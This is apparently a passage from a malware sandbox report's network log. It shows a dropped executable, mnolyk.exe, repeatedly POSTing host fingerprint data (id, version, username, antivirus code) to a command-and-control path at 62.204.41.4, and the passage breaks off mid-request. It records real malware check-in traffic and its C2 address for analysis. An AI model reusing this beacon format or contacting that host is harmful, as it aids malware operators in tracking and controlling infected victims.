                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:02.321962118 CET325INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:01 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            137192.168.2.44983262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:02.498157978 CET326OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:02.564692020 CET326INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            138192.168.2.44983362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:02.749208927 CET327OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:02.814519882 CET327INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:02 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            139192.168.2.44983462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:03.045301914 CET328OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:03.110811949 CET328INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            14192.168.2.44970962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:27.822242975 CET203OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:27.887223959 CET203INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:27 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            140192.168.2.44983562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:03.284885883 CET329OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:03.348592043 CET329INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            141192.168.2.44983662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:03.530213118 CET330OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:03.594712019 CET330INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:03 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            142192.168.2.44983762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:06.766539097 CET331OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:06.830897093 CET331INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:06 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            143192.168.2.44983862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:06.998531103 CET332OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:07.065126896 CET332INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            144192.168.2.44983962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:07.247674942 CET333OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:07.311855078 CET333INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            145192.168.2.44984062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:07.481729031 CET334OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:07.545599937 CET334INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            146192.168.2.44984162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:07.721676111 CET335OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:07.788988113 CET335INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:07 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            147192.168.2.44984262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:07.992649078 CET336OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:08.061883926 CET336INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            148192.168.2.44984362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:08.255379915 CET337OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:08.320699930 CET337INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            149192.168.2.44984462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:08.504141092 CET338OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:08.567250967 CET338INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            15192.168.2.44971062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:28.056200981 CET204OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:28.122034073 CET204INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:28 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            150192.168.2.44984562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:08.786241055 CET339OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:08.849670887 CET339INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            151192.168.2.44984662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:09.124319077 CET340OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:09.187618971 CET340INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            152192.168.2.44984762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:09.522559881 CET341OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:09.584252119 CET341INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            153192.168.2.44984862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:09.783237934 CET342OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:09.847910881 CET342INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            154192.168.2.44984962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:10.042740107 CET343OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:10.109348059 CET343INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            155192.168.2.44985062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:10.307888985 CET344OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
